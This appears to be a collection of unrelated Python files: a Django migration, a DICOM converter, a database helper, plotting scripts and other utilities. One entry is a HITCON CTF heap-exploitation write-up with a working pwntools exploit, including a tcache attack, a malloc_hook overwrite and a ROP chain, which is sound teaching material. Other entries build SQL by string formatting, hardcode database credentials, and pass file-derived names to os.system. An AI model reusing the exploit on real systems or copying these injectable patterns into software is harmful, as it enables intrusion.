('slug', models.SlugField(unique=True, max_length=255, verbose_name='slug')),
('class_name', models.CharField(max_length=255, null=True, verbose_name='class name', blank=True)),
('creation_date', models.DateTimeField(auto_now_add=True, verbose_name='creation date')),
('modification_date', models.DateTimeField(auto_now=True, verbose_name='modification date')),
],
options={
'verbose_name': 'category',
'verbose_name_plural': 'categories',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Entry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=255, verbose_name='title')),
('slug', models.SlugField(max_length=255, verbose_name='slug', unique_for_date=b'publication_date')),
('pict', models.ImageField(null=True, upload_to=b'img/entries/', blank=True)),
('publication_date', models.DateTimeField(default=datetime.datetime(2014, 9, 17, 23, 19, 10, 787418), verbose_name='publication date', db_index=True)),
('status', models.IntegerField(default=0, db_index=True, verbose_name='status', choices=[(0, 'Offline'), (1, 'Online')])),
('body', models.TextField(verbose_name='body')),
('overview', models.TextField()),
('author', models.ForeignKey(verbose_name='author', to=settings.AUTH_USER_MODEL)),
('category', models.ForeignKey(verbose_name='category', to='blog.Category')),
],
options={
'verbose_name': 'article',
'verbose_name_plural': 'articles',
},
bases=(models.Model,),
),
]
|
23,490 | c458531704def9bcb9d533ef999d43d7c452e9b1 | # Takes a list of DICOM files, loops through them and uses dcm4che's dcm2jpg to dump PNG exports using a folder path like /run-name/patient-id/accession-number/seriesNumber-seriesDescription.png
# Run name is there to segment/partition the exports (ie avoid having too many files in one folder)
import sys, os, datetime, pydicom
dicomBase = '/path/to/dicom-files/'
pngBase = '/path/to/png-exports/'
cmdPath = '/path/to/dcm4che-5.23.2/bin/dcm2jpg -F PNG -q 1.0'
if __name__ == '__main__':
if(len(sys.argv) < 2):
print("USAGE: python dcm2png.py dicom-file-list.txt run-name")
#python3 dcm2png.py dicom-file-list.txt run1
exit();
listFile = open(sys.argv[1])
runName = sys.argv[2]
i = 0;
print(datetime.datetime.now())
# loop through the .dcm images listed in the supplied text files
for dcmPath in listFile:
# Open the DICOM, get important attributes
dcmPath = dcmPath.rstrip('\n') # remove training new line
dicom = pydicom.dcmread(dcmPath)
pid = str(dicom.PatientID)
acn = str(dicom.AccessionNumber)
seriesDesc = "missing"
if 'SeriesDescription' in dicom:
seriesDesc = str(dicom.SeriesDescription)
seriesNum = "x"
if 'SeriesNumber' in dicom:
seriesNum = str(dicom.SeriesNumber)
# Check series description to eliminate laterals?!?
if 'lat' in seriesDesc.lower():
continue;
# Create a folder
destinationDir = f'{pngBase}{runName}/{pid}/{acn}/'
#print(dcmPath + ' => ' + destinationDir)
os.system('mkdir -p ' + destinationDir)
fileName = seriesNum + '-' + seriesDesc.replace(' ','-').replace('(','').replace(')','') + '.png'
# Convert to PNG
cmd = f"{cmdPath} {dcmPath} {destinationDir}{fileName}"
#print(cmd)
os.system(cmd)
i += 1
#if( i > 10 ): break;
print(datetime.datetime.now())
|
23,491 | 6d3fb6f2c1d993c4a4591a6f3ef0138006b8ddae | # count the number occurrence of a specific character in a string
ch = 'vineet'
srch = 'e'
count = 0
for c in ch:
if c == srch:
count += 1
print(count)
# alternative way
print(ch.count('e')) |
23,492 | 62cf2dbdfc70874aa228514e96f1324bf3fcc26b | from django import template
from decimal import Decimal
register = template.Library()
@register.filter(name='calc_subtotal')
def calc_subtotal(price, quantity):
return price * quantity
# Sub total calculation for sale price
@register.filter(name='calc_subtotal_offer')
def calc_subtotal_offer(sale_price, quantity):
return sale_price * quantity |
23,493 | 1ce74a455143a0c2f2caeaa9f68676eb21ce7f95 | '''
All right, so a super classic ptmalloc CTF pwn, we have an obvious UAF bug:
free does not NULL the stored pointer, so that means we can free any object
any number of times AND we can maintain a writable reference to stale pointers.
With pre libc-2.29, this is super trivial, we can target tcache, get UAFs, tcache
poisoning, done. After libc-2.29 it gets a bit trickier to get around the double
free check, but all that needs is zeroing out the key field, so that's super weak souce.
Okkkay, so what's the challenge then? Why is it called Onepunch?
Well, damn. We suddenly realize that every allocation is with calloc, so we can't actually
target the tcache! But also, every allocation is forced over the fastbin and below the largebin
limit. So no largebin linking attack or fastbin poisoning by default either. Well what then?
And also, what is that secret command?
Ooops, it looks like we actually _can_ do a malloc, but only to the fix 535 size and also only if a
counter is 7 or more. What is this counter?
Well damn. This is pointing to an object that is .... immediately freed by the program? What the hell?
Well.. turns out, ptmalloc is a really sneaky bastard. Guess what, not only is the tcache descriptor struct
stored on the heap, it is not even true that it is stored with the very first allocation of the heap, because
the very first malloc actually triggers the malloc_hook, which initializes malloc_hook to zero AND returns
an allocated chunk... which is to say, it bypasses tcache path. Therefore, tcache is only initialized on the SECOND
allocation, by which time this chunk has already been freed up, and since it is a tcache-less free, the memory
went right back into the top! So the end result was that this funky object is actually OVERLAPPING the tcache
descriptor... and that means that the "magic" value which must be 7+ is actually the index of tcache->counts[]
that corresponds to bin 0x200 which, guessed it, corresponds to the allocation size 535.
So that basically means that we are not able to allocate with malloc UNLESS the tcache bin's count is 7+. However,
due to the default value of the global `_mp.tcache_count` being 7, this means in practice that we should only be able
to have maximum 7 in the heap-based tcache struct's counts array's appropriate index. And that means that we can only
allocate from a tcache bin when it is full. Which is a problem because tcache poisoning needs TWO consecutive allocations.
Also, hey, cool, now we see why the challenge is called "onepunch". Get it? And of course that's a Manga [reference](https://en.wikipedia.org/wiki/One-Punch_Man).
Well HITCON, that's just awesome. I hope the reader will appreciate the exploit name choice as well, courtesy of 2can.
So hold on, let's get back to the challenge solving.
We can't do fastbin poisoning, largebin poisoning, or tcache poisoning, how are we supposed to win exactly?
Cool, now we have an actual challenge! Let's solve it.
Read through all the comments all the way to the end to follow the construction of the exploit. There's
also a discussion at the end about alternative solutions.
'''
'''
First the basics, commands for communicating with the menu of the program that includes the commands:
shome
retire
debut
rename
'''
import os
os.environ['TERM'] = 'xterm-256color'
from pwn import *
import time, struct
context.update(arch='amd64')
context.update(terminal=['tmux', 'splitw', '-h'])
REMOTE = True
gdbscript = [
# 'b calloc',
'continue'
]
REMOTE = False
def cmd(cmdIdx):
p.recvuntil(">")
p.sendline(str(cmdIdx)) #it is a read(8), but with \n we close it
def leak_heap(idx):
cmd(3)
print p.recvuntil("idx: ")
p.sendline(str(idx))
print p.recvuntil("hero name: ")
leak = p.recvuntil("#")
leak = leak[:len(leak)-2]
print "leak len is %d" % len(leak)
leak = leak + "\x00\x00"
leak = struct.unpack("<Q", leak)[0]
print "#"
return leak
def leak_libc(idx):
cmd(3)
print p.recvuntil("idx: ")
p.sendline(str(idx))
print p.recvuntil("hero name: ")
leak = p.recvn(6)
leak = leak + "\x00\x00"
leak = struct.unpack("<Q", leak)[0]
print p.recvuntil("#")
return leak
def show(idx):
cmd(3)
print p.recvuntil("idx: ")
p.sendline(str(idx))
print p.recvuntil("hero name: ")
print p.recvuntil("#")
def retire(idx):
cmd(4)
print p.recvuntil("idx: ")
p.sendline(str(idx))
def debut(idx, name):
cmd(1)
print p.recvuntil("idx: ")
p.sendline(str(idx))
print p.recvuntil("hero name: ")
p.send(name)
def rename(idx, name):
cmd(2)
print p.recvuntil("idx: ")
p.sendline(str(idx))
print p.recvuntil("hero name: ")
p.send(name) #note: use \n to terminate it if len(name) < hero[idx].len
def secret(data):
cmd(50056)
p.send(data)
print p.recvuntil("5. Exit")
if REMOTE == True:
p = remote('52.198.120.1', 48763)
else:
p = process('./one_punch', aslr=False)
gdb.attach(p, gdbscript='\n'.join(gdbscript))
'''
And here comes the actual exploit code.
First, let's get a heap leak. if we retire two chunks, the first will have a tcache fd to the second.
'''
debut(0, (0x100-8)*"A")
debut(1, (0x100-8)*"B")
retire(0)
retire(1)
heap_base = leak_heap(1) - 0x260
print "heap base: 0x%016x" % heap_base
#now we get a libc leak. we can only maintain 3 pointers, but, we can forget our pointers
#and since we allocate with calloc, we never consumer the tcache, only fill it.
#so we can easily fill the tcache for any slot. we select the slot that is necessary for the rest - the secretslot.
#535 is 0x217, that will be 0x220 sized chunks. we request 0x218 so we can write it totally, just in case.
#we need 7 in total, and we need a special reference to 1 of them ,that is not on the edge so that it doesn't get consolidated. so 5+1+1
for i in range(0, 5):
debut(0, (0x218)*"C")
retire(0)
#however, we'll need to poison the fd of the first one on the bin (it's LIFO!), so we need a reference maintained to that. so use idx 2 for that.
#actually nevermind we can't do this now!
debut(2, (0x218)*"X")
retire(2)
#now the 7th one, again to 0
debut(0, (0x218)*"C")
retire(0)
#now we do one more - after this it's a candidate for leaking because it goes into unsorted now!
debut(0, (0x218)*"D")
#but first, we must create a fencepost allocation so that freeing it does not consolidate it into the top.
debut(1, 0x100*"F")
#now we can free it and leak libc!
retire(0)
libc_base = leak_libc(0) - (0x00007f057b0faca0- 0x7f057af16000)
print "libc base: 0x%016x" % libc_base
free_hook = libc_base + (0x7fd89ebe65a8 - 0x7fd89e9ff000)
print "free hook address: 0x%016x" % free_hook
system = libc_base + (0x7fd89ea51fd0 - 0x7fd89e9ff000)
print "system address: 0x%016x" % system
malloc_hook = libc_base + 0x1e4c30
#all right, now we have all the leaks, we have the best leaks. tremendous, people are saying these are the best leaks ever.
#we wanted to do tcache poisoning, but the stupid check screws us over.
#ok so we have the leaks, but to recap, we can't have it easy because:
# fastbin sizes are too small, <127 not allowed so we can't allocate to fastbin -> fastbin poisoning out (global_max_fast overwrite could work but if we achieved that we'd have already won anyway here
# largbin sizes start at 1024, so largebin poisoning is out for the same reason
# unsorted bin attack is properly mitigated on 19.04 so that's also out
# we have the custom defence against tcache poisoning (circumventing that is the whole game)
# only thing left is smallbin cache back filling attack, so we try that.
'''
Wait, what is smallbin cache back filling attack? Well that's a valid question, because it hasn't been really
documented in house-of-xyz CTF lore... except that the incomparable 2can has already explained this in the ptmalloc
fanzine years ago, so, really... it's the obvious exploit primitive choice!
See here btw: vhttp://tukan.farm/2017/07/08/tcache/
'''
# Ok, so, let's put together a smallbin cache filling attack that allows us to write that bin address SOMEWHERE. Then we figure out where to write it.
# first of all, we need to get some chunk into the smallbin. we already have a guy in the unsorted bin. if we now make an allocation request for an even bigger size, that guy is going to get moved into the smallbin. so let's do that.
#we must use 1 here, because we need to keep 0 pointing to the original smallbin chunk.
debut(1, (0x400-8)*"u")
# good, 0 landed on the smallbin. now we got to keep 0. so how do we free one more guy here? well, now we can do a double free, oy :)
# but this means we need a reference remaining to one of the guys we freed onto the tcache bin. I think we have a reference to 2, so we should be able to free 2 again, which should actually put it into the unsorted bin? nope, double free detected.
#however, due to the stupid double free protection, we can't *just* free this guy. we have to go and delete the key first. we can do that no problem.
rename(2, p64(0) + p64(0) + 8*"X" + "\n")
#now free it to the unsorted bin!
retire(2)
#now again alloc too large -> we get 2 on the smallbin!
debut(1, (0x400-8)*"u")
#now there is supposed to be 2 chunks in smallbin, and we are supposed to have pointers to both of them
#from here the smallbin tcache attack should work, giving us the win by releasing the tcache custom "lock"
#so the idea is to have exactly 1 slot in the tcache -> we get this by doing one secret allocation right now
secret("A"*535)
#and now we prime the smallbin attack by overwriting 0's fd and bk
#the chunk->bck->fd = bin write is our target. so if we want to write to X, we have to use the address X-0x20
#however, we must be very careful -> the fd must remain valid! so we have to write back here the correct value.
#since the smallbin cache filling goes BACKWARDS, the one we have to corrupt is 2 not 0!
#valid_fd = heap_base + (0x5557c0eceef0 - 0x5557c0ec9000 - 0x5000) #wtf i can't math
valid_fd = (0x55a65a39c330 - 0x55a65a39b000) + heap_base
#p.interactive()
'''
Cool! Now all we need is the proper choice for `smallbin_corruption_target_addr` here.
At this point, I'll confess that I went off on a huuuuuge tangent. I came up with some targets,
that aren't viable, or are viable but through some really heavy lifting. In the end, my fantastic
teammate 2can brought attention to the obvious target and we got the flag from there rather quickly.
Of course, I could tell you all about the alternative direction I came up with... but I don't want to spoil
future CTF challenges. So let's leave that out for now :)
Because, OF COURSE, the right choice is corrupting... `_mp.tcache_count` ITSELF.
Since, if that becomes > 7, then we can simply free more chunks onto the tcache bin, which means that malloc can
be called multiple times before we reach 6. So that gives us the tcache poisoning we wanted and the win, keeping
in mind that the challenge runs under a seccomp filter that ruins system() calls, so instead we had to reapply
the same rop chain with a stack lift gadget that was developed for [LazyHouse](https://gist.github.com/andigena/4628eae54ad185107fd3ca91fc6a92a3).
So how about the stack lift gadget? Well, we could target a free hook and use an rdi/rsp exchange gadget.. but even easier, we can use
a stack lift gadget in the literal sense, like `add rsp, 0x48 ; ret`. This is because, conveniently, the debut
function always reads the input first into a stack buffer and then allocates and copies it to the alloced buffer. That's cool because,
this way we'll have control over stack contents. Lovely.
'''
#so this is _mp.tcache_count`
smallbin_corruption_target_addr = libc_base + 0x1e42e0
rename(2, p64(valid_fd) + p64(smallbin_corruption_target_addr - 0x10) + "\n")
#rename(2, p64(valid_fd) + p64(heap_base+0x10+0x20-0x10) + "\n")
#now we have to trigger actually this smallbin tcache-ing. well, we need an exact size allocation request! we no longer need 2 so let's use it
debut(2, (0x218)*"D")
#now we can allocate many many chunks from tcache. We no longer need 0, so let's replace it with what will be the container for the path string that the rop chain uses.
debut(0, "/home/lazyhouse/flag\0".ljust(0x400-1))
# pause()
#Now we get another guy freed up and put on the tcache
secret(cyclic(25))
retire(2)
#Now we'll Double Free it, by corrupting the key this won't be detected.
rename(2, 'A'*8 + 'B'*8)
retire(2)
#Now we modify it's fd to point instead of itself to malloc_hook
rename(2, p64(malloc_hook-8) + cyclic(24))
retire(2)
rename(2, p64(malloc_hook-8) + cyclic(16))
#Now we allocate one guy, this primes the tcache poisoning
pivot = libc_base + 0x000000000008cfd6 # add rsp, 0x48 ; ret
print 'pivot: ', hex(pivot)
secret(p64(pivot) + p64(pivot) + p64(pivot))
#And finally we trigger the tcache poison, giving us the address over the malloc_hook, and use the content to overwrite it.
secret(p64(pivot) + p64(pivot) + p64(pivot))
# secret(cyclic(25))
# secret(cyclic(25))
'''
Now let's put the rop chain together... because the next allocation request will trigger malloc_hook with our desired
chain actually on the stack, just at a wrong offset. But since we invoke `add rsp, 0x48 ; ret` as the malloc hook, everything
comes together.
Lovely!
'''
flag_path_addr = heap_base + 0x1e70
print '0x55555555ae70, flag_path_addr: ', hex(flag_path_addr)
pop_rdi = libc_base + 0x0000000000026542 # pop rdi ; ret
pop_rsi = libc_base + 0x0000000000026f9e # pop rsi ; ret
pop_rdx = libc_base + 0x000000000012bda6 # pop rdx ; ret
pop_rcx = libc_base + 0x000000000010b31e # pop rcx ; ret
pop_rax = libc_base + 0x0000000000047cf8 # pop rax ; ret
ret = libc_base + 0x000000000002535f # ret
syscall_ret = libc_base + 0x00000000000cf6c5 # syscall ; ret
### for dev/debugging
# debut(0, '/home/lazyhouse/flag\0'.ljust(0x200))
print 'set *(size_t*)&__malloc_hook={}'.format(hex(pivot))
###
chain = flat([
ret,
ret,
ret,
pop_rax,
2, # open
pop_rdi,
flag_path_addr,
pop_rsi,
constants.O_RDONLY,
syscall_ret, # open
pop_rax,
0, # read
pop_rdi,
3,
pop_rsi,
flag_path_addr,
pop_rdx,
0x100,
syscall_ret,
pop_rax,
1, # write
pop_rdi,
1,
pop_rsi,
flag_path_addr,
pop_rdx,
0x100,
syscall_ret,
])
debut(0, chain.ljust(0x200))
p.interactive()
'''
And finally, we get the flag written out to us:
hitcon{y0u_f0rg0t_h0u23_0f_10r3_0r_4fra1d_1ar93_b1n_4tt4ck}
.... okay. Well, given the flag of LazyHouse, we highly suspect
that the challenge creators _thought_ that we will solve LazyHouse
with this attack, and we will not realize tcache reenablement here
and use a different vector.
One guess would be that we were supposed to do a largebin attack
to hit global_max_fast for fastbin poisoning reenablement (we are guessing).
We used that successfully for LazyHouse, and it works here too.
So as a collorary, it is worth mentioning that yes, even though we can't
do largebin sized allocations, it is not actually true we couldn't do
largebin attack here - as I realized as soon as we got the flag and it got
me thinking. Since, that only needs a smartly corrupted largebin-sized chunk
to be on the heap's unsorted bin when an allocation request happens; if that
request will be to a different size, this chunk can then go into a largebin,
then this corrupt chunk will trigger the known largebin attack.
And, I guess the trick is, we can free a non-largebin unto unsorted and then using
chunk overlapping that I didn't describe here but is very much possible and we
did achieve actually (alloc obj0 0x400, free back to unsorted to top, then alloc
obj1/obj2 smaller sizes, to overlap with the stale obj0 pointer), we can actually
manipulate a fake largebin-sized chunks into triggering the attack.
Maybe that's what the author had in mind. On the other hand, at first I didn't know
what they were driving at by mentioning house of lore. But finally I realized it, so
I'll amend this write-up with this.
So, "House of Lore" is smallbin poisoning basically. Same concept as for fastbin, but
the difference is that the safe unlinking check that was introduced severly limits targets
for it. In fact I used to think that it has no real applicability for ptmalloc with tcache
anymore, but as it turns out in exactly this kind of contrived "onepunch malloc" situation,
it does. So here is the description for it:
The general idea is that we corrupt the bck pointer of the smallbin chunk at the head of the
bin, so 2 allocations return a selected memory address (the fake bck) on the second attempt.
So just like fastbin/tcache poisoning. However, we can't choose _any_ address because of the
safe unlink check. Rather, we need a 'bck' where 'bck->fd == victim'. So an address where
we can control a pointer's value, but somehow is still an interesting target for us. As it
turns out, there are plenty like that due to all the bins. We could leverage the arena's
fastbins or regular bins for this. This actually works fine with malloc. But here is the problem:
with calloc, after libc_malloc returns, the returned chunk's size field is used to do the memset
to 0 and of course the size there includes +0x10 for the headers, so actually it is memset to
`chunk2mem(chunk)->size-0x10`. Unfortunately, with the arena based targets, that field can only
be 0 or a heap pointer, so that is always a sigsegv.
This is where I was so I considered this sort of useless, since with mallocs, tcache poisoning will
always be a much better target. However - IF we have the 1 malloc restriction (and don't overcome
it the "easy" way), well we can go after the tcache thread struct on the heap itself! This also
has an array of controllable heap pointers in the `entries` array, so it's a good target for smallbin
poisoning. The trick is getting a valid size field in there. I think there are two ways to do this:
1) manipulate overlapped-chunk sizes in order to free a chunk into the second largest tcache bin +
free chunks into the first and second smallest tcache bins. Then target the first `tcache->entries[]`
slot for smallbin poisoning. This will result in using 0x100 as size, so we manage to allocate over
the entries array. Since it is 64*8=512 bytes long, with a 0x400 size restriction here it would have
been easily achievable to directly then corrupt the entries member for the 0x220 slot and then win.
2) the harder way is to use one more trick instead of tcache "feng shui". As it turns out, still the
`unlink()` step in forward and backward consolidation of chunks in a free call only checks safe unlinking,
no other validity checks on the pointed chunks of `fd` and `bk`. That means that we could use an
overlapped chunk to create a fake forward coallesced chunk with fake `fd` and `bk` both pointing at
`&tcache->entries[X]`. Consequently, one of the entries members will be adjusted to become the other one.
That in turn again gives a direct allocation over a portion of `tcache->entries[]` with the malloc. From there,
one can again directly write a fake valid size field, and then free again to get back to the count 7 and then
redo the whole "house of lore" to once again allocate over the region, this time corrupting the entries
member for 0x220 instead of it size and then with the tcache-based malloc.
So that's our guess of what the challenge solution was supposed to be like... in our mind, this is too
complicated though.
'''
|
23,494 | 242b3f04ecf835de54376f46ebaf4a770c70c8a6 | def aumentar(preço=0, taxa=0, formato=False):
'''
:param preço: Preço digitado pelo usuário.
:param taxa: Taxa aplicada para aumentar o preço do usuário.
:param formato: Formatação em R$ se True e sem Formatação se False
:return: Resultado do preço com a taxa aplicada.
'''
res = preço + (preço * taxa/100)
return res if formato is False else moeda(res)
def diminuir(preço=0, taxa=0, formato=False):
res = preço - (preço * taxa/100)
return res if formato is False else moeda(res)
def dobro(preço=0, formato=False):
res = preço * 2
return res if not formato else moeda(res)
def metade(preço=0, formato=False):
res = preço / 2
return res if not formato else moeda(res)
def moeda(preço=0, moeda='R$'):
return f'{moeda}{preço:.2f}'.replace('.',',') #Função replace é utilizada para substituir valores
def resumo(preço=0, taxaa=10, taxar=5):
print('-'*30)
print('RESUMO DO VALOR'.center(30)) #Função center é utilizada para centralizar uma string ou número
print('-'*30)
print(f'Preço analisado: \t{moeda(preço)}') #\t é utilizado para tabulação dos valores
print(f'Dobro do preço: \t{dobro(preço,True)}')
print(f'Metade do preço: \t{metade(preço,True)}')
print(f'{taxaa}% de aumento: \t{aumentar(preço, taxaa, True)}')
print(f'{taxar}% de redução: \t\t{diminuir(preço, taxar, True)}') #Quando necessário, utilizar \t mais de uma vez para tabulação
print('-'*30)
|
23,495 | 48b1f68fe0148b67eb50227ad24a446f49c065ad | from setuptools import setup, find_packages
from dpm import __VERSION__
import os
with open('README.md') as f:
long_description = f.read()
setup(
name='dpm',
version='.'.join((str(v) for v in __VERSION__)),
author='DICEhub',
author_email='info@dicehub.com',
description='DICE package manager',
long_description=long_description,
url='http://dicehub.com',
packages = find_packages(),
dependency_links=[
'https://github.com/g2p/rfc6266/archive/master.zip#egg=rfc6266-0.0.4',
],
install_requires=[
'PyYAML',
'rfc3987',
'progressbar2',
'requests',
'rfc6266'],
)
|
23,496 | 8374a8251f6f7344a102cc5c0a2114b6bddae18e | import os, re
from multiprocessing import Process, Manager
class Analyzer(object):
def __init__(self, num_proc, path_to_data):
self.num_proc = num_proc
self.path_to_data = path_to_data
self.global_lst = Manager().list()
self.topic_lst = os.listdir(path_to_data)
if ((len(self.topic_lst) / num_proc) -
(len(self.topic_lst) // num_proc) != 0):
self.size_group = (len(os.listdir(path_to_data)) // num_proc) + 1
else:
self.size_group = (len(os.listdir(path_to_data)) // num_proc)
for i in range(len(self.topic_lst)): self.global_lst.append([10])
def analyzer(self, index_process):
for i in range(self.size_group * index_process,
self.size_group * (index_process + 1)):
buffer_str = ""
if i < len(self.topic_lst):
filename_lst = os.listdir(self.path_to_data + '/' + self.topic_lst[i])
for text in filename_lst:
with open(self.path_to_data + '/' + self.topic_lst[i] + '/' + text, 'r') as file:
buffer_str += file.read().lower()
words_lst = re.split(r'\W| ', buffer_str)
words_lst = list(set(words_lst))
words_lst = list(filter(None, words_lst))
self.global_lst[i] = words_lst
def determine_topic(self, filename):
buffer_str = ""
with open(filename, 'r') as file:
buffer_str = file.read().lower()
words_lst = re.split(r'\W| ', buffer_str)
words_lst = list(set(words_lst))
words_lst = list(filter(None, words_lst))
result_lst = [0 for i in range(len(self.topic_lst))]
for index_topic in range(len(self.topic_lst)):
result_lst[index_topic] = len(self.global_lst[index_topic]) - \
len(set(self.global_lst[index_topic]) - set(words_lst))
return self.topic_lst[result_lst.index(max(result_lst))]
def start_process(self):
proc_lst = [Process(target=self.analyzer, args=(i,)) for i in range(self.num_proc)]
for i in proc_lst: i.start()
for i in proc_lst: i.join()
|
23,497 | 357711e5b2a4379d9f5f6c2560bd93b47f28b341 | #!/usr/bin/env python
"""overall database manipulation class
.. module:: DBHelper
:platform: Ubuntu Unix
:synopsis: A module for general database connection
.. moduleauthor:: Lijuan Marissa Zhou <marissa.zhou.cn@gmail.com>
.. copyright:: copyright reserved
Image file names:
SenseCam - 00031075.JPG
Vicon - 00011328.JPG -> 0_0_date_time.j
Autographer - B00000781_21I5I2_20140303_1200294.JPG
"""
import _mysql
import MySQLdb as mdb
import unicodedata
from timeutils import *
from datetime import datetime as dt
from threading import Thread
from time import sleep
from django.db import IntegrityError
from dateutil.tz import tzlocal
from xml.dom import minidom
#from fileuploader.models import *
class DBHelper:
# database connection
con = None
@staticmethod
def initialize():
"""This function initializes an DBHelper instance
:param :
:returns:
"""
DBHelper.con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
@staticmethod
def update_picture_record(addresses, album_ids):
""" This function updates all image addresses in the database image table
Initialise MYSQL connection
:param :
:returns: No return
"""
import time
time.strftime('%Y-%m-%d %H:%M:%S')
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
print album_ids
for row in addresses:
with con:
capture_time = row[2]
infos = row[1].split("/")
#date_string = infos[2]+"-"+infos[3]+"-"+infos[4]
date_string = str(capture_time.date())
#print date_string
aid = album_ids[date_string]# album id
cur = con.cursor()
para_1 = "'"+ row[1]+"'"
para_2 = aid
para_3 = infos[2]
para_4 = infos[3]
para_5 = infos[4]
para_6 = "'"+ row[0]+"'"
capture_time = row[2]
query = "UPDATE fileuploader_picture SET file=%s,album_id=%s,year=%s,month=%s,day=%s,capture_at=CAST('%s' AS DATETIME) WHERE file=%s" % (para_1,para_2,para_3,para_4,para_5,capture_time,para_6,)
print query
#print query
cur.execute(query)
@staticmethod
def update_sensor_file(src, dst):
""" This function updates all sensor_file_records
Initialise MYSQL connection
:param :
:returns: No return
"""
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
src = "'"+ src+"'"
dst = "'"+ dst+"'"
query = "UPDATE fileuploader_sensorfile SET file=%s WHERE file=%s" % (src,dst)
cur = con.cursor()
cur.execute(query)
@staticmethod
def remove_empty_albums(aid):
""" This function keeps album table clean without any empty albums
Empty albums are albums that has no picture associated with that album
This is necessary when uploading SenseCam images which are uploaded in a temporary album at the beginning and a temporary album is created for this purposes
:param aid: album id
:type aid: big integar
:returns: No return
"""
print "aid"
print aid
if aid is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT count(*) from fileuploader_picture WHERE album_id=%s" % (aid)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
# there is no picture in this album
print "len(data)"
print len(data)
if len(data) == 0:
query = "DELETE from fileuploader_album WHERE id=%s" % (aid)
print query
cur = con.cursor()
cur.execute(query)
@staticmethod
def get_uid(username):
""" This function retrieves user id according to username
:param aid: album id
:type aid: big integar
:returns: No return
"""
if username is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from auth_user WHERE username=%s" % (username)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def get_sensor_type_id(abbreviation):
""" This function retrieves sensor type id according to abbreviation
:param abbreviation: sensor type abbreviation
:type abbreviation: string
:returns: No return
"""
if abbreviation is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from fileuploader_sensortype WHERE abbreviation=%s" % (abbreviation)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def get_picture_id(path):
""" This function retrieves user id according to username
:param aid: album id
:type aid: big integar
:returns: No return
"""
if path is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from fileuploader_picture WHERE file=%s" % (path)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def get_concept_id(concept):
""" This function retrieves user id according to username
:param aid: album id
:type aid: big integar
:returns: No return
"""
if path is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
query = "SELECT id from annotater_annotationterm WHERE concept=%s" % (concept)
cur = con.cursor()
cur.execute(query)
data = cur.fetchall()
print "len(data)"
print data
if len(data) > 0:
return data[0]
return None
@staticmethod
def insert_annotationactions(annotations):
""" This function add all annotation records into database through one database connection
:param annotations: annotations list extracted from exported annotation file from the old sensecambrowser system
:type annotations: list of 3 dimensional list
:returns: No return
"""
if annotations is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
for annotation in annotations:
username = annotation[0]
path = annotation[1]
concept = annotation[2]
uid = DBHelper.get_user_id(username)
iid = DBHelper.get_user_id(path)
cid = DBHelper.get_user_id(concept)
query = "insert into annotater_annotationaction(annotator_id,image_id,concept_id) values(%s,%s,%s)" % (uid,iid,cid)
cur = con.cursor()
cur.execute(query)
@staticmethod
def insert_sensors(sensors):
""" This function adds all sensor records into the new database through one database connection
:param sensors: sensors list extracted from exported sensor file from the old sensecambrowser system
:type sensors: list of sensor list
:returns: No return
"""
if sensors is None:
return
con = mdb.connect('localhost', 'root', 'sensepass', 'sensecambrowser')
with con:
for sensor in sensors:
"""
username = annotation[0]
path = annotation[1]
concept = annotation[2]
uid = DBHelper.get_user_id(username)
iid = DBHelper.get_user_id(path)
cid = DBHelper.get_user_id(concept)
query = "insert into annotater_annotationaction(annotator_id,image_id,concept_id) values(%s,%s,%s)" % (uid,iid,cid)
cur = con.cursor()
cur.execute(query)
"""
|
23,498 | 71b845ee6d8304da73c06e13277df35d27065cc3 | import ROOT as r
import glob
parameters = {}
parameters['NoiseROC'] = dict(file='NoiseROC', canvas = 'Mean Noise per ROC', xaxistitle = 'Mean Noise [e^{-}]', gradB = 500, gradC = 1000)
parameters['Noise'] = dict(file='NoiseDistr', canvas = 'Noise distribution', xaxistitle = 'Noise [e^{-}]', gradB = 50, gradC = 400)
parameters['RelativeGainWidth'] = dict(file='RelativeGainWidth', canvas = 'Relative Gain Width', xaxistitle = 'Relative Gain Width', gradB = 0.1, gradC = 0.2)
parameters['VcalThresholdWidth'] = dict(file='VcalThresholdWidth', canvas = 'Vcal Threshold Width', xaxistitle = 'Width of Vcal Threshold [e^{-}]', gradB = 200, gradC = 400)
parameters['PHCalibrationParameter1'] = dict(file='PHCalibrationParameter1', canvas = 'PH Calibration Parameter1', xaxistitle = 'Parameter 1', gradB = 0, gradC = 2)
parameters['PedestalSpread'] = dict(file='PedestalSpread', canvas = 'Pedestal Spread', xaxistitle = 'Average Pedestal [e^{-}]', gradB = 2500, gradC = 5000)
#Only in case the current is measured at -20C:
parameters['Current150V'] = dict(file='Current150V', canvas = 'Current at Voltage 150V', xaxistitle = 'Measured current at 150V [microA]', gradB = 2, gradC = 10)
parameters['SlopeIV'] = dict(file='SlopeIV', canvas = 'Slope IV', xaxistitle = 'Slope IV [microA]', gradB = 400, gradC = 2)
# This is for all modules:
#ProdCenters = ['CERN_all', 'PERUGIA', 'AACHEN', 'ETH']
# This is for all modules with ROC digv21resppin
ProdCenters = ['CERN_respin', 'ETH']
temperatures = ['m20', 'p17']
def GetFilePath(par, temperature):
FilePath = []
for ProdCenter in ProdCenters:
FilePath += glob.glob('Results/'+ProdCenter+'*/'+temperature+parameters[par]['file']+'.root')
return FilePath
def CreateStack(FilePath, par, temperature):
